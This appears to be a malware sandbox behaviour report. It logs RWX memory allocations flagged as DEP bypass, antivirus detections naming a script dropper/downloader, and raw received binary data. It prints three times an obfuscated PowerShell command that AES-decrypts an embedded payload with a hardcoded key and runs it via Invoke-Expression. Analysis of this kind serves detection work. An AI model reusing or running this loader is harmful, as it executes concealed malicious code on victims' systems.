protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02723000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02724000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02725000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02726000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02727000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02728000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02729000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02afe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2632
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
cmdline powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell.exe
parameters: -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
filepath: powershell.exe
1 1 0
Skyhigh BehavesLike.VBS.Dropper.dp
Symantec ISB.Downloader!gen81
Kaspersky HEUR:Trojan.Script.Generic
Kingsoft Script.Dropper.vbs.2023281
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received ¸5’6½‘ßmÿæÉtH÷ÈOtþ¸‘ÔAlFæ ‚O°8Ç­ÍÇ!5ðÿ՗›V¬B´.TñÎßï‹F!•”Š%ÔeuClŒ°0ñ‰tÁ"†þcìp:dfÕDQÁ”~¸Üª¯‚¢·wù`´F$×F’*ñ ªùàj2T´¬Y¸ŽÝxÉ)*È1 Üádr²µŠ^ß®%ˆ™÷)M ï€e!¢$¸Éã¾ )fq¹˜žMšÀɬæ]À)k±Üó“$è°Hê³é՘4’^ëãu÷ùà¾äáՌ”ƒ1¨Ð¶™\Û[]›ätÓ¢„p8œ>é/w›ÁÏᥝJ?©ºƒ_ßY‘iBÑí’ì<Û;zq}o9<<©>c ï]p¿sÓ¬ûC†R¿ ÿ̈́Ó,3‰r“é݇ŽÚI©¥,ù`eϦ¯¡½=qŸZ±á ~£¿uÚîFà='ÓÓ/á‚7×3Ä)QZ¹®ã¶֞0—r6Žù•âû"Ói ¡—ÕóÍ+ěVgxØ_&/Îæ`b–ä÷¼j+ÜéjÆãG鋍îµí›§Ó¿‡BÌ)••ÀAß{XuR*©»å òi–P^ˆ7ûç?†¹yA™Jî%{bRÆèÛX“^øÉ ¬îÜ(Öiè5zX¼:PAGæØu9ˆWkW\;²}Ë`1}ÃåXÒk›I!+êR:ØN£ï™ '1…ÓNñoXœ¨îÏ¯3²¨â—X.Iøœº!bA W¾I¥}^ D‡“É? ‹M¨œ¯–Œ×Â××I*,M+-°!@?ÍY—S¥€@ˆ£oíOëŒéuPO§X¤…DËÖ^Ýð<ëFÑÇ!¥x5ß-ïFÀ0j«í›~#¡mB,‘DªŠ„Qec˜¾N¢¤@–GQߧ¶Ñ<HI¢jû,º™¤%O¾›Jú¡´U÷ä}26î„Æçl‘µ^1_ƒ«-·¤ºsܘ¢'h x$gŒû8|¿Ó£F7jqÔzN{—ó$’K4íR{àg˽ŽÓ´ì2}A¼4º]Aˆ¨>¥ü\ഉ.ݲ8nÀàaÆ}¨Ö_-å #· ‰J„xÉGÞ¡ò8ûÍ›ín¬LÅwFª¤{íSý3?]2Gâr̬Vx^ïÙNŸjbò>鰑¸1#þ_í‡oHáŠB ;(,¿ÅñušÅ‹S=ùmb1í@ž«I Ó´C"°b9ä`!¦ÕjµSÅ7mÍü³IÐ$!lÕñ•‘dWª¥G·ÈA$tÀŽ01<JYb’ bzKÚîkÇ™¸²rC ÂІ`O'±É’ƒKDíc‚AýpQ!Ri¯Úñ9ö²–ŘP¾ØX…©»1÷öÀÌ¡fÝæ,ôÑ/› .¤°ãé‹:<LÍ*‘ÏÃ)XZœÙ>Ÿ–Œ°‚ܯBG8á77¬nød,êP‹Zâ†rC ֘ʑæñ˜âV YB‹#ßx´é­¦Û°ÃG¢VR0 ÖûdˆwM¼Èܞ:m#Y·×‡Fšk#“ÓéVW X¨Žpژ‹M Xš¢óđ6ê%F‘‰¿OHsfþ™YÐ2meäd22ÌAsð¼º[ ’aÐÖú}:9>ŸRô8Ük!C»¨é•ŒRCß,2Pmf,zü0/¦%¤4;XȖ"ÑôRËÀ¬ÔDVEò؏FÓñøæc§Ô7<T{à]±½X…qðÔOº%C7=1IcÝ8rMm¾1Ȕ »ÒG$ö²ÂŠ›ÃÑ>–(© Ž‰úÃê%fØÈã £B »éšP¹õ2š•V!C]ão•12SÓÕ)hITlÒĬþ·R½°º<jŀ`Jõ0:d ‡4z‚1÷”4&ґ¹ï‘€®›L‚–\àµ:?»>øNÕºÛíDuƒcpÒ}ÎR¶A`lõÀ@\€ÉÃím£sL^ ]CƒÓ°ÂêÀ ¼ç`ꃭŒš—®Ò}ò$h¢ ©´ß_W8»±:• µÁÀp®å$Ù5‚dZ[5ۜºçA³_1f×Hò)3Yä8Ë rD¨†ã‹F–òÏâííŽD«&™œ¨R¦öœ]õ ´D¦@†²hÓ$²Ôƒ•ugPàÀXÖՓN®A=hôÀ·žY¶b¿,²&蝂‘C¸ÄøiH¾¸ûH°0I´0èH;SÈË¢@|2ԕ%½°Ú½b*©˜^s5Q<ċHÁöæ°/¯¦PãÒzÄ¡ˆî { Õ:t*Ŗï­æv¢6Hƒ¡ôƒÛ°Àb-ˆ dW‚3»#pÌo¹¼í;†B§’G …RŒA;NI,Š‹´]ö¬'›"¶„·np{YPm&ÇPqˆØ• Æ꼆Vh]DD8+g߃…HåH̛9£ø³¤û·Žá»·¾ &)Y[p= àtM¹JÑ}…ãÓê —xUéUdà ÑÌÓ;ï¿p8Íh¾ÏkSÿ²\V5p“îz7¶†•£ƒÂ• 6æz,ÈQ=ùø¸ðý:’…Äæè/{tùãz]‹ eWÒȪ„(¨èžOø½ó‹—ž•|Ý"߈ë"¤uü]0<ï‰øÍc5ˆ@¶ÝÅa˜OT, >ª¬ö’i<Ö,ÒéwªµÞ®.x5ß<ÌúY¼³b KK:zׯ=(ï–Ü+ž˜uÐÎG ¾—:_þl²h§SLÐU_3§þ¬Ã*­ÖXc× º9l±0y¯=?õa’VQOv©ÓÿVô˜ó•*‘­òoßò¥ꊾ©þG iep´;OBfAü΁\­`tÉò…ƒŽ $ŠKƒå÷„ÿՒÚyV ÌÑUŽU'¯°?ëœb‰¥€ŽµÉìk´kÏ8ðÑÊÒQ“M´ÇÞÿVTè¥fUiÀ³ÿϏ§üß ("¬e6õoÚ±Á¥–…<ÿùtéÓüYË£œò$ÓÛ÷éÿ«^òÌê;cº_ :؞YG¥‹–•zü"ºžŸžNŸÃgÖ´ˆd‰Q@.âEmƒÜ€~¥:y…`ŽH“G§  ,6¨< ÿkã×¹!•âY ßƋˆÔYT[¾'¯Èâ­´J@¼ÐÕ¬ÈшÕv®ù”3rĖ®Éä~Câ°ÓHƒ™tô{yéÿ«2)¹&¶4î%Ň*»ÈçD×÷I w¾OÿoOýY ¤•cА¾Ó#~°†Yõ #C$áMÍ+ÐXÀ³þ FDZƒ;Y¦‰UP»´ÌlØVïӓù{b §–Hw£B<ܪ¤ˆ,2I"©%¡ .ê'O£s€ê™¼¥óD.(iò õ“\žÝ33\…g`X±âٚÏ÷¯žs»6œ!$ªG<s_ž,x £É'ƒƒš¾éR3)çå™J,æçéaÔE(–#! 6û HušR¡iHoÃuW™ùÝ#ÚÀ·,:æäÞ‘2ƒ´°´]Åg™“I8Dl,…àUŸåxÕØm¡öÕß ¸Äâö³0Ú·D^M¦o%¶Ú–'su ¡ê±³$ãp jTUœ‰ÎŒI#"Þ’ª_‡8¾›WjØo’Ø7pÐ(A ÕgŸžf™nÁ끬ÚÅõ¤4Ò7`†;#;È7{_ñe4­‰€ Hxº¬‰N¦P9e®kœ Å ªv½z¢äšPrQâØR²Fÿžs´`â8 ìÚۏá=F2ž¥^¿ 